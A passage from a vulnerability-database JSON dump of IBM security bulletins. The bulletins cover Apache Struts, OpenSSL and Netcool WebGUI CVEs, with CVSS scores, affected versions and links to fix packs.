"modified": "2021-03-19T09:21:51", "id": "2728A54A733C1334AD5FF98B90433841FD176869AA41A20F157E87B17EAD4D49", "href": "https://www.ibm.com/support/pages/node/6434139", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-06-06T14:35:02", "description": "## Summary\n\nIBM Security Guardium has fixed these vulnerabilities.\n\n## Vulnerability Details\n\n** CVEID: **[CVE-2020-17530](<https://vulners.com/cve/CVE-2020-17530>) \n** DESCRIPTION: **Apache Struts could allow a remote attacker to execute arbitrary code on the system, caused by a forced double OGNL evaluation on raw user input in tag attributes. By sending specially crafted data, an attacker could exploit this vulnerability to execute arbitrary code on the system. \nCVSS Base score: 8.1 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/192743](<https://exchange.xforce.ibmcloud.com/vulnerabilities/192743>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H) \n \n** CVEID: **[CVE-2020-1971](<https://vulners.com/cve/CVE-2020-1971>) \n** DESCRIPTION: **OpenSSL is vulnerable to a denial of service, caused by a NULL pointer dereference. If the GENERAL_NAME_cmp function contain an EDIPARTYNAME, an attacker could exploit this vulnerability to cause the application to crash. \nCVSS Base score: 7.5 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/192748](<https://exchange.xforce.ibmcloud.com/vulnerabilities/192748>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H)\n\n## Affected Products and Versions\n\nAffected Product(s)| Version(s) \n---|--- \nIBM Security Guardium| 10.5 \n \nIBM Security Guardium| 10.6 \nIBM Security Guardium| 11.0 \nIBM Security Guardium| 11.1 \n \nIBM Security Guardium| 11.2 \n \nIBM Security Guardium| 11.3 \n \n \n \n\n\n## Remediation/Fixes\n\nProduct| Versions| Fix \n---|---|--- \nIBM Security Guardium| 10.5 \n| [http://www.ibm.com/support/fixcentral/swg/quickorder?parent=IBM%20Security&amp;product=ibm/Information+Management/InfoSphere+Guardium&amp;release=10.0&amp;platform=All&amp;function=fixId&amp;fixids=SqlGuard_10.0p540_Bundle_Jun-08-2021&amp;includeSupersedes=0&amp;source=fc](<http://www.ibm.com/support/fixcentral/swg/quickorder?parent=IBM%20Security&product=ibm/Information+Management/InfoSphere+Guardium&release=10.0&platform=All&function=fixId&fixids=SqlGuard_10.0p540_Bundle_Jun-08-2021&includeSupersedes=0&source=fc>) \nIBM Security Guardium| 10.6 \n| [http://www.ibm.com/support/fixcentral/swg/quickorder?parent=IBM%20Security&amp;product=ibm/Information+Management/InfoSphere+Guardium&amp;release=10.0&amp;platform=All&amp;function=fixId&amp;fixids=SqlGuard_10.0p665_Bundle_Apr-07-2021&amp;includeSupersedes=0&amp;source=fc](<http://www.ibm.com/support/fixcentral/swg/quickorder?parent=IBM%20Security&product=ibm/Information+Management/InfoSphere+Guardium&release=10.0&platform=All&function=fixId&fixids=SqlGuard_10.0p665_Bundle_Apr-07-2021&includeSupersedes=0&source=fc> \"http://www.ibm.com/support/fixcentral/swg/quickorder?parent=IBM%20Security&product=ibm/Information+Management/InfoSphere+Guardium&release=10.0&platform=All&function=fixId&fixids=SqlGuard_10.0p665_Bundle_Apr-07-2021&includeSupersedes=0&source=fc\" ) \nIBM Security Guardium| 11.0 \n| [http://www.ibm.com/support/fixcentral/swg/quickorder?parent=IBM%20Security&amp;product=ibm/Information+Management/InfoSphere+Guardium&amp;release=11.0&amp;platform=All&amp;function=fixId&amp;fixids=SqlGuard_11.0p35_Bundle_Mar-30-2021&amp;includeSupersedes=0&amp;source=fc](<http://www.ibm.com/support/fixcentral/swg/quickorder?parent=IBM%20Security&product=ibm/Information+Management/InfoSphere+Guardium&release=11.0&platform=All&function=fixId&fixids=SqlGuard_11.0p35_Bundle_Mar-30-2021&includeSupersedes=0&source=fc> \"http://www.ibm.com/support/fixcentral/swg/quickorder?parent=IBM%20Security&product=ibm/Information+Management/InfoSphere+Guardium&release=11.0&platform=All&function=fixId&fixids=SqlGuard_11.0p35_Bundle_Mar-30-2021&includeSupersedes=0&source=fc\" ) \nIBM Security Guardium| 11.1 \n| [http://www.ibm.com/support/fixcentral/swg/quickorder?parent=IBM%20Security&amp;product=ibm/Information+Management/InfoSphere+Guardium&amp;release=11.0&amp;platform=All&amp;function=fixId&amp;fixids=SqlGuard_11.0p140_Bundle_May-24-2021&amp;includeSupersedes=0&amp;source=fc](<http://www.ibm.com/support/fixcentral/swg/quickorder?parent=IBM%20Security&product=ibm/Information+Management/InfoSphere+Guardium&release=11.0&platform=All&function=fixId&fixids=SqlGuard_11.0p140_Bundle_May-24-2021&includeSupersedes=0&source=fc>) \nIBM Security Guardium| 11.2 \n| [http://www.ibm.com/support/fixcentral/swg/quickorder?parent=IBM%20Security&amp;product=ibm/Information+Management/InfoSphere+Guardium&amp;release=11.0&amp;platform=All&amp;function=fixId&amp;fixids=SqlGuard_11.0p240_Bundle_May-10-2021&amp;includeSupersedes=0&amp;source=fc](<http://www.ibm.com/support/fixcentral/swg/quickorder?parent=IBM%20Security&product=ibm/Information+Management/InfoSphere+Guardium&release=11.0&platform=All&function=fixId&fixids=SqlGuard_11.0p240_Bundle_May-10-2021&includeSupersedes=0&source=fc>) \nIBM Security Guardium| 11.3| [http://www.ibm.com/support/fixcentral/swg/quickorder?parent=IBM%20Security&amp;product=ibm/Information+Management/InfoSphere+Guardium&amp;release=11.0&amp;platform=All&amp;function=fixId&amp;fixids=SqlGuard_11.0p315_Bundle_May-21-2021&amp;includeSupersedes=0&amp;source=fc](<http://www.ibm.com/support/fixcentral/swg/quickorder?parent=IBM%20Security&product=ibm/Information+Management/InfoSphere+Guardium&release=11.0&platform=All&function=fixId&fixids=SqlGuard_11.0p315_Bundle_May-21-2021&includeSupersedes=0&source=fc>) \n \n## Workarounds and Mitigations\n\nNone\n\n## ", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-06-22T18:02:27", "type": "ibm", "title": "Security Bulletin: IBM Security Guardium is affected by multiple vulnerabilities (CVE-2020-17530, CVE-2020-1971)", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-17530", "CVE-2020-1971"], "modified": "2021-06-22T18:02:27", "id": "E3347BCB529A35601F044748C20F62BDDA272E18F4F99AF1DC1EC2079BD36858", "href": "https://www.ibm.com/support/pages/node/6443719", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-02-27T21:45:00", "description": "## Summary\n\nFix is available for multiple vulnerabilities affecting Tivoli Netcool/OMNIbus WebGUI (CVE-2021-20336, CVE-2020-17530).\n\n## Vulnerability Details\n\n** CVEID: **[CVE-2021-20336](<https://vulners.com/cve/CVE-2021-20336>) \n** DESCRIPTION: **IBM Tivoli Netcool/OMNIbus_GUI is vulnerable to stored cross-site scripting. This vulnerability allows users to embed arbitrary JavaScript code in the Web UI thus altering the intended functionality potentially leading to credentials disclosure within a trusted session. \nCVSS Base score: 6.4 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/194350](<https://exchange.xforce.ibmcloud.com/vulnerabilities/194350>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N) \n \n** CVEID: **[CVE-2020-17530](<https://vulners.com/cve/CVE-2020-17530>) \n** DESCRIPTION: **Apache Struts could allow a remote attacker to execute arbitrary code on the system, caused by a forced double OGNL evaluation on raw user input in tag attributes. By sending specially crafted data, an attacker could exploit this vulnerability to execute arbitrary code on the system. \nCVSS Base score: 8.1 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/192743](<https://exchange.xforce.ibmcloud.com/vulnerabilities/192743>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H)\n\n## Affected Products and Versions\n\nAffected Product(s)| Version(s) \n---|--- \nIBM Tivoli Netcool/OMNIbus_GUI| 8.1.x \n \n## Remediation/Fixes\n\n**Product**| **CVE**| **APAR**| **Remediation/First Fix** \n---|---|---|--- \nTivoli Netcool/OMNIbus WebGUI \n| CVE-2021-20336| IJ30110| Apply [WebGUI 8.1.0 Fix Pack 22](<https://www.ibm.com/support/pages/node/6420367> \"WebGUI 8.1.0 Fix Pack 22\" ) \n \nCVE-2020-17530| IJ30067 \n \nFor unsupported versions IBM recommends upgrading to a fixed, supported version of the product.\n\n## Workarounds and Mitigations\n\nNone\n\n \n\n\n## ", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-03-22T13:06:36", "type": "ibm", "title": "Security Bulletin: Multiple vulnerabilities is affecting Tivoli Netcool/OMNIbus WebGUI (CVE-2021-20336, CVE-2020-17530)", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-17530", "CVE-2021-20336"], "modified": "2021-03-22T13:06:36", "id": "3FA2879FBADE8540F6B4D5091DA5772A30EB11207B58722F47A672ABFF7C289C", "href": "https://www.ibm.com/support/pages/node/6427953", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-02-27T21:49:12", "description": "## Summary\n\nApache Struts is vulnerable to a denial of service, caused by an access permission override when performing a file upload. By sending a specially crafted request, an attacker could exploit this vulnerability to cause subsequent upload actions to fail.\n\n## Vulnerability Details\n\n** CVEID: **[CVE-2019-0233](<https://vulners.com/cve/CVE-2019-0233>) \n** DESCRIPTION: **Apache Struts is vulnerable to a denial of service, caused by an access permission override when performing a file upload. By sending a specially crafted request, an attacker could exploit this vulnerability to cause subsequent upload actions to fail. \nCVSS Base score: 5.9 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/186699](<https://exchange.xforce.ibmcloud.com/vulnerabilities/186699>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H) \n \n** CVEID: **[CVE-2019-0230](<https://vulners.com/cve/CVE-2019-0230>) \n** DESCRIPTION: **Apache Struts could allow a remote attacker to execute arbitrary code on the system, caused by a forced double OGNL evaluation on raw user input in tag attributes. By sending specially crafted data, an attacker could exploit this vulnerability to execute arbitrary code on the system. \nCVSS Base score: 7.3 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/186702](<https://exchange.xforce.ibmcloud.com/vulnerabilities/186702>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L)\n\n## Affected Products and Versions\n\nAffected Product(s)| Version(s) \n---|--- \nContent Collector for Email| 4.0.1.10 \nContent Collector for Microsoft SharePoint| 4.0.1.10 \nContent Collector for File Systems| 4.0.1.10 \nContent Collector for IBM Connections| 4.0.1.10 \n \n \n\n\n## Remediation/Fixes\n\n**Product** | **VRM**| **Remediation** \n---|---|--- \nContent Collector for Email| 4.0.1.10| Use Content Collector for Email 4.0.1.10 [Interim Fix IF014](<http://www.ibm.com/support/fixcentral/quickorder?product=ibm%2FInformation+Management%2FContent+Collector&fixids=4.0.1.10-IBM-ICC-IF014&source=SAR> \"Interim Fix IF014\" ) \nContent Collector for File Systems| 4.0.1.10| Use Content Collector for File Systems 4.0.1.10 [Interim Fix IF014](<http://www.ibm.com/support/fixcentral/quickorder?product=ibm%2FInformation+Management%2FContent+Collector&fixids=4.0.1.10-IBM-ICC-IF014&source=SAR> \"Interim Fix IF014\" ) \nContent Collector for Microsoft SharePoint| 4.0.1.10| Use Content Collector for Microsoft SharePoint 4.0.1.10 [Interim Fix IF014](<http://www.ibm.com/support/fixcentral/quickorder?product=ibm%2FInformation+Management%2FContent+Collector&fixids=4.0.1.10-IBM-ICC-IF014&source=SAR> \"Interim Fix IF014\" ) \nContent Collector for IBM Connections| 4.0.1.10| Use Content Collector for IBM Connections 4.0.1.10 [Interim Fix IF014](<http://www.ibm.com/support/fixcentral/quickorder?product=ibm%2FInformation+Management%2FContent+Collector&fixids=4.0.1.10-IBM-ICC-IF014&source=SAR> \"Interim Fix IF014\" ) \n \n## Workarounds and Mitigations\n\nNone\n\n## ", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2020-11-04T09:07:08", "type": "ibm", "title": "Security Bulletin: Apache Struts (Publicly disclosed vulnerability) affects Content Collector for Email, Content Collector for File Systems, Content Collector for Microsoft SharePoint and Content Collector for IBM Connections", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-0230", "CVE-2019-0233"], "modified": "2020-11-04T09:07:08", "id": "60BC7D4DCC3D358CA3A091D2D1C15EE5A67539C2664E72739BD35D6406A88E4A", "href": "https://www.ibm.com/support/pages/node/6359445", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-06-24T06:05:22", "description": "## Summary\n\nIBM Sterling Order Management Apache Struts vulnerablity\n\n## Vulnerability Details\n\n** CVEID: **[CVE-2019-0233](<https://vulners.com/cve/CVE-2019-0233>) \n** DESCRIPTION: **Apache Struts is vulnerable to a denial of service, caused by an access permission override when performing a file upload. By sending a specially crafted request, an attacker could exploit this vulnerability to cause subsequent upload actions to fail. \nCVSS Base score: 5.9 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/186699](<https://exchange.xforce.ibmcloud.com/vulnerabilities/186699>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H) \n \n** CVEID: **[CVE-2019-0230](<https://vulners.com/cve/CVE-2019-0230>) \n** DESCRIPTION: **Apache Struts could allow a remote attacker to execute arbitrary code on the system, caused by a forced double OGNL evaluation on raw user input in tag attributes. By sending specially crafted data, an attacker could exploit this vulnerability to execute arbitrary code on the system. \nCVSS Base score: 7.3 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/186702](<https://exchange.xforce.ibmcloud.com/vulnerabilities/186702>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L)\n\n## Affected Products and Versions\n\nAffected Product(s)| Version(s) \n---|--- \nIBM Sterling Order Management| 10.0 \n \n\n\n## Remediation/Fixes\n\nOrder Management on premise release notes - <https://www.ibm.com/docs/en/order-management-sw/10.0?topic=software-fixes-by-fix-pack-version>\n\nFix Central Link (**FP details URL)**: \n[http://www.ibm.com/support/fixcentral/quickorder?product=ibm%2FOther+software%2FSterling+Selling+and+Fulfillment+Foundation&amp;fixids=10.0.0.0-Sterling-SSFF-All-fp29-Installer&amp;source=SAR](<http://www.ibm.com/support/fixcentral/quickorder?product=ibm%2FOther+software%2FSterling+Selling+and+Fulfillment+Foundation&fixids=10.0.0.0-Sterling-SSFF-All-fp29-Installer&source=SAR>)\n\n## Workarounds and Mitigations\n\nNone\n\n## ", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-05-11T01:06:34", "type": "ibm", "title": "Security Bulletin: IBM Sterling Order Management Apache Struts vulnerablity", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-0230", "CVE-2019-0233"], "modified": "2022-05-11T01:06:34", "id": "C22DE952FD6E1544B14AE2735F81ACAE3EF08509FC895F0AAF0AC7485A98F798", "href": "https://www.ibm.com/support/pages/node/6565845", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-06-24T06:01:56", "description": "## Summary\n\nIBM Sterling File Gateway has addressed multiple security vulnerabilities in Apache Struts\n\n## Vulnerability Details\n\n** CVEID: **[CVE-2019-0233](<https://vulners.com/cve/CVE-2019-0233>) \n** DESCRIPTION: **Apache Struts is vulnerable to a denial of service, caused by an access permission override when performing a file upload. By sending a specially crafted request, an attacker could exploit this vulnerability to cause subsequent upload actions to fail. \nCVSS Base score: 5.9 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/186699](<https://exchange.xforce.ibmcloud.com/vulnerabilities/186699>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H) \n \n** CVEID: **[CVE-2019-0230](<https://vulners.com/cve/CVE-2019-0230>) \n** DESCRIPTION: **Apache Struts could allow a remote attacker to execute arbitrary code on the system, caused by a forced double OGNL evaluation on raw user input in tag attributes. By sending specially crafted data, an attacker could exploit this vulnerability to execute arbitrary code on the system. \nCVSS Base score: 7.3 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/186702](<https://exchange.xforce.ibmcloud.com/vulnerabilities/186702>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L)\n\n## Affected Products and Versions\n\nAffected Product(s)| Version(s) \n---|--- \nIBM Sterling File Gateway| 2.2.0.0 - 6.0.3.2 \n \n## Remediation/Fixes\n\n** Product &amp; Version**| **APAR**| ** Remediation &amp; Fix** \n---|---|--- \n2.2.0.0 - 2.2.6.5_2| IT34076| Apply IBM Sterling B2B Integrator version 5.2.6.5_3, 6.0.3.3 or 6.1.0.0 on [Fix Central](<http://www-933.ibm.com/support/fixcentral/swg/selectFixes?parent=ibm~Other%2Bsoftware&product=ibm/Other+software/Sterling+B2B+Integrator&release=All&platform=All&function=all>) \n6.0.0.0 - 6.0.3.2| IT34076| Apply IBM Sterling B2B Integrator version 6.0.3.3 or 6.1.0.0 on [Fix Central](<http://www-933.ibm.com/support/fixcentral/swg/selectFixes?parent=ibm~Other%2Bsoftware&product=ibm/Other+software/Sterling+B2B+Integrator&release=All&platform=All&function=all>) \n \n## Workarounds and Mitigations\n\nNone\n\n## ", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-07-22T15:14:01", "type": "ibm", "title": "Security Bulletin: Multiple Security Vulnerabilities in Apache Struts Affect IBM Sterling File Gateway (CVE-2019-0233, CVE-2019-0230)", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-0230", "CVE-2019-0233"], "modified": "2022-07-22T15:14:01", "id": "C6AE70E5471CDF678253E267AB7C45FA772A777F24502EE50E243BD88E300D13", "href": "https://www.ibm.com/support/pages/node/6324787", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-02-27T21:49:24", "description": "## Summary\n\nApache Struts is vulnerable to a denial of service, caused by an access permission override when performing a file upload. By sending a specially crafted request, an attacker could exploit this vulnerability to cause subsequent upload actions to fail.\n\n## Vulnerability Details\n\n** CVEID: **[CVE-2019-0233](<https://vulners.com/cve/CVE-2019-0233>) \n** DESCRIPTION: **Apache Struts is vulnerable to a denial of service, caused by an access permission override when performing a file upload. By sending a specially crafted request, an attacker could exploit this vulnerability to cause subsequent upload actions to fail. \nCVSS Base score: 5.9 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/186699](<https://exchange.xforce.ibmcloud.com/vulnerabilities/186699>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H) \n \n** CVEID: **[CVE-2019-0230](<https://vulners.com/cve/CVE-2019-0230>) \n** DESCRIPTION: **Apache Struts could allow a remote attacker to execute arbitrary code on the system, caused by a forced double OGNL evaluation on raw user input in tag attributes. By sending specially crafted data, an attacker could exploit this vulnerability to execute arbitrary code on the system. \nCVSS Base score: 7.3 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/186702](<https://exchange.xforce.ibmcloud.com/vulnerabilities/186702>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L)\n\n## Affected Products and Versions\n\nAffected Product(s)| Version(s) \n---|--- \nContent Collector for Email| 4.0.1.10 \nContent Collector for Microsoft SharePoint| 4.0.1.10 \nContent Collector for File Systems| 4.0.1.10 \nContent Collector for IBM Connections| 4.0.1.10 \n \n \n\n\n## Remediation/Fixes\n\n**Product** | **VRM**| **Remediation** \n---|---|--- \nContent Collector for Email| 4.0.1.10| Use Content Collector for Email 4.0.1.10 [Interim Fix IF014](<http://www.ibm.com/support/fixcentral/quickorder?product=ibm%2FInformation+Management%2FContent+Collector&fixids=4.0.1.10-IBM-ICC-IF014&source=SAR> \"Interim Fix IF014\" ) \nContent Collector for File Systems| 4.0.1.10| Use Content Collector for File Systems 4.0.1.10 [Interim Fix IF014](<http://www.ibm.com/support/fixcentral/quickorder?product=ibm%2FInformation+Management%2FContent+Collector&fixids=4.0.1.10-IBM-ICC-IF014&source=SAR> \"Interim Fix IF014\" ) \nContent Collector for Microsoft SharePoint| 4.0.1.10| Use Content Collector for Microsoft SharePoint 4.0.1.10 [Interim Fix IF014](<http://www.ibm.com/support/fixcentral/quickorder?product=ibm%2FInformation+Management%2FContent+Collector&fixids=4.0.1.10-IBM-ICC-IF014&source=SAR> \"Interim Fix IF014\" ) \nContent Collector for IBM Connections| 4.0.1.10| Use Content Collector for IBM Connections 4.0.1.10 [Interim Fix IF014](<http://www.ibm.com/support/fixcentral/quickorder?product=ibm%2FInformation+Management%2FContent+Collector&fixids=4.0.1.10-IBM-ICC-IF014&source=SAR> \"Interim Fix IF014\" ) \n \n## Workarounds and Mitigations\n\nNone\n\n## ", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2020-10-28T19:21:52", "type": "ibm", "title": "Security Bulletin: Apache Struts (Publicly disclosed vulnerability) affects Content Collector for Email, Content Collector for File Systems, Content Collector for Microsoft SharePoint and Content Collector for IBM Connections", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-0230", "CVE-2019-0233"], "modified": "2020-10-28T19:21:52", "id": "20DAAA2A40C4A633F7230B8255F0CADBA6E88A77DD305EC21132BECBFF011089", "href": "https://www.ibm.com/support/pages/node/6356621", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-02-27T21:49:24", "description": "## Summary\n\nApache Struts is vulnerable to a denial of service, caused by an access permission override when performing a file upload. By sending a specially crafted request, an attacker could exploit this vulnerability to cause subsequent upload actions to fail.\n\n## Vulnerability Details\n\n** CVEID: **[CVE-2019-0233](<https://vulners.com/cve/CVE-2019-0233>) \n** DESCRIPTION: **Apache Struts is vulnerable to a denial of service, caused by an access permission override when performing a file upload. By sending a specially crafted request, an attacker could exploit this vulnerability to cause subsequent upload actions to fail. \nCVSS Base score: 5.9 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/186699](<https://exchange.xforce.ibmcloud.com/vulnerabilities/186699>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H) \n \n** CVEID: **[CVE-2019-0230](<https://vulners.com/cve/CVE-2019-0230>) \n** DESCRIPTION: **Apache Struts could allow a remote attacker to execute arbitrary code on the system, caused by a forced double OGNL evaluation on raw user input in tag attributes. By sending specially crafted data, an attacker could exploit this vulnerability to execute arbitrary code on the system. \nCVSS Base score: 7.3 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/186702](<https://exchange.xforce.ibmcloud.com/vulnerabilities/186702>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L)\n\n## Affected Products and Versions\n\nAffected Product(s)| Version(s) \n---|--- \nContent Collector for Email| 4.0.1.10 \nContent Collector for Microsoft SharePoint| 4.0.1.10 \nContent Collector for File Systems| 4.0.1.10 \nContent Collector for IBM Connections| 4.0.1.10 \n \n \n\n\n## Remediation/Fixes\n\n**Product** | **VRM**| **Remediation** \n---|---|--- \nContent Collector for Email| 4.0.1.10| Use Content Collector for Email 4.0.1.10 [Interim Fix 